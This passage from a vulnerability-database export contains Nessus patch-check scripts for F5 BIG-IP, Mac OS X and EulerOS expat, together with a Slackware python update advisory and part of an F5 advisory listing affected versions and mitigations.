script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52320548\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.5.7\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.3.2\",\"11.5.7\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:56", "bulletinFamily": "scanner", "description": "The remote host is running a version of Mac OS X 10.10.5 or 10.11.6 that is missing a security update. It is therefore, affected by multiple vulnerabilities :\n\n - A memory corruption issue exists in the Sandbox component that allows an unauthenticated, remote attacker to escape an application sandbox.\n (CVE-2017-2512)\n\n - An information disclosure vulnerability exists in the Kernel component due to improper sanitization of user-supplied input. A local attacker can exploit this to read the contents of restricted memory.\n (CVE-2017-2516)\n\n - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524)\n\n - A flaw exists in the CoreAnimation component when handling specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2527)\n\n - A race condition exists in the DiskArbitration feature that allow a local attacker to gain system-level privileges. (CVE-2017-2533)\n\n - A resource exhaustion issue exists in the Security component due to improper validation of user-supplied input. A local attacker can exploit this to exhaust resources and escape an application sandbox.\n (CVE-2017-2535)\n\n - Multiple memory corruption issues exist in the WindowServer component that allow a local attacker to execute arbitrary code with system-level privileges.\n (CVE-2017-2537, CVE-2017-2548)\n\n - An information disclosure vulnerability exists in WindowServer component in the _XGetConnectionPSN() function due to improper validation of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2540)\n\n - A stack-based buffer overflow condition exists in the WindowServer component in the _XGetWindowMovementGroup() function due to improper validation of user-supplied input. A local attacker can exploit this to execute arbitrary code with the privileges of WindowServer.\n (CVE-2017-2541)\n\n - A memory corruption issue exists in the Kernel component that allow a local attacker to gain kernel-level privileges. (CVE-2017-2546)\n\n - A race condition exists in the IOSurface component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-6979)\n\n - An information disclosure vulnerability exists in HFS component due to improper sanitization of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-6990)", "modified": "2018-07-16T00:00:00", "id": "MACOSX_SECUPD_10_11_6_2017-002__10_10_5_2017-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100271", "published": "2017-05-18T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2017-002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100271);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/16 12:48:31\");\n\n script_cve_id(\n \"CVE-2017-2512\",\n \"CVE-2017-2516\",\n \"CVE-2017-2524\",\n \"CVE-2017-2527\",\n \"CVE-2017-2533\",\n \"CVE-2017-2535\",\n \"CVE-2017-2537\",\n \"CVE-2017-2540\",\n \"CVE-2017-2541\",\n \"CVE-2017-2546\",\n \"CVE-2017-2548\",\n \"CVE-2017-6979\",\n \"CVE-2017-6990\"\n );\n script_bugtraq_id(\n 98483\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-05-15-1\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2017-002)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.5 or 10.11.6\nthat is missing a security update. It is therefore, affected by\nmultiple vulnerabilities :\n\n - A memory corruption issue exists in the Sandbox\n component that allows an unauthenticated, remote\n attacker to escape an application sandbox.\n (CVE-2017-2512)\n\n - An information disclosure vulnerability exists in the\n Kernel component due to improper sanitization of\n user-supplied input. A local attacker can exploit this\n to read the contents of restricted memory.\n (CVE-2017-2516)\n\n - An unspecified memory corruption issue exists in the\n TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2524)\n\n - A flaw exists in the CoreAnimation component when\n handling specially crafted data. An unauthenticated,\n remote attacker can exploit this to execute arbitrary\n code. (CVE-2017-2527)\n\n - A race condition exists in the DiskArbitration feature\n that allow a local attacker to gain system-level\n privileges. (CVE-2017-2533)\n\n - A resource exhaustion issue exists in the Security\n component due to improper validation of user-supplied\n input. A local attacker can exploit this to exhaust\n resources and escape an application sandbox.\n (CVE-2017-2535)\n\n - Multiple memory corruption issues exist in the\n WindowServer component that allow a local attacker to\n execute arbitrary code with system-level privileges.\n (CVE-2017-2537, CVE-2017-2548)\n\n - An information disclosure vulnerability exists in\n WindowServer component in the _XGetConnectionPSN()\n function due to improper validation of user-supplied\n input. A local attacker can exploit this to read the\n contents of restricted memory. (CVE-2017-2540)\n\n - A stack-based buffer overflow condition exists in the\n WindowServer component in the _XGetWindowMovementGroup()\n function due to improper validation of user-supplied\n input. A local attacker can exploit this to execute\n arbitrary code with the privileges of WindowServer.\n (CVE-2017-2541)\n\n - A memory corruption issue exists in the Kernel component\n that allow a local attacker to gain kernel-level\n privileges. (CVE-2017-2546)\n\n - A race condition exists in the IOSurface component that\n allows a local attacker to execute arbitrary code with\n kernel-level privileges. (CVE-2017-6979)\n\n - An information disclosure vulnerability exists in HFS\n component due to improper sanitization of user-supplied\n input. A local attacker can exploit this to read the\n contents of restricted memory. (CVE-2017-6990)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207797\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2017/May/47\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-002 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(10\\.5|11\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.10.5 or Mac OS X 10.11.6\");\n\nif (\"10.10.5\" >< os || \"10.11.6\" >< os) patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:33", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2017-1002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99849", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99849);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1767d439\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10\",\n \"expat-devel-2.1.0-10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:42", "bulletinFamily": "unix", "description": "New python packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/python-2.7.14-i586-1_slack14.2.txz: Upgraded.\n Updated to the latest 2.7.x release.\n This fixes some security issues related to the bundled expat library.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0718\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4472\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9063\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9233\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/python-2.7.14-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/python-2.7.14-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/python-2.7.14-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/python-2.7.14-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/python-2.7.14-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/python-2.7.14-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python-2.7.14-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python-2.7.14-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n9d70703b48f3c7965ddc8b1327523df5 python-2.7.14-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nf01272718080952b48ba77d41e7fa3d1 python-2.7.14-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n280cbdcb6405cb41ab9946d248265232 python-2.7.14-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n87a9b0e9b74d7c6881c8a60767ee787c python-2.7.14-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n60efb0be0d51a43bb521989b591925d1 python-2.7.14-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n8e3e9b242ac0afb6cfdac9c631b938fb python-2.7.14-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n0a370c195295cb937c7756846266373c d/python-2.7.14-i586-1.txz\n\nSlackware x86_64 -current package:\ne67b2e27b293a45f3685be152e784772 d/python-2.7.14-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg python-2.7.14-i586-1_slack14.2.txz", "modified": "2017-09-22T23:33:04", "published": "2017-09-22T23:33:04", "id": "SSA-2017-266-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.436421", "title": "python", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-05-21T22:32:03", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 630446 and 674189 (BIG-IP) and ID 677266 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H52320548 on the **Diagnostics** > **Identified** > **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | ASM control plane, iControl SOAP, eventd \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.3 | 13.1.0 \n13.0.1 \n12.1.3.2 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Edge Gateway | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP GTM | 11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP PSM | 11.4.1 | None | High | iControl SOAP, eventd \nBIG-IP WebAccelerator | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | iControlPortal.cgi \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\niControl SOAP, eventd and BIG-IP ASM control plane\n\nTo mitigate this vulnerability for iControl SOAP, the **eventd** process, and the BIG-IP ASM control plane, permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nbig3d/gtmd\n\nTo mitigate this vulnerability for the **big3d**/**gtmd** process, limit connections to port 4353 to trusted hosts. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>).\n\n**Note**: If you run **big3d_install** on BIG-IP versions prior to 11.5.0, it is possible that you may install a vulnerable version of **big3d** on systems that are running non-vulnerable versions of the BIG-IP system. In this case, upgrade to a fixed version or hotfix, and refer to [K13312: Overview of the BIG-IP DNS big3d_install, bigip_add, and gtm_add utilities (11.x - 13.x)](<https://support.f5.com/csp/article/K13312>) for information about running **big3d_install** to resolve the issue. \n\n**Note**: The iquery protocol used by the BIG-IP DNS system (formerly BIG-IP GTM) also uses port 4353. Ensure that all of the peer devices are included when you limit connections by IP address.\n\n * [K17329: 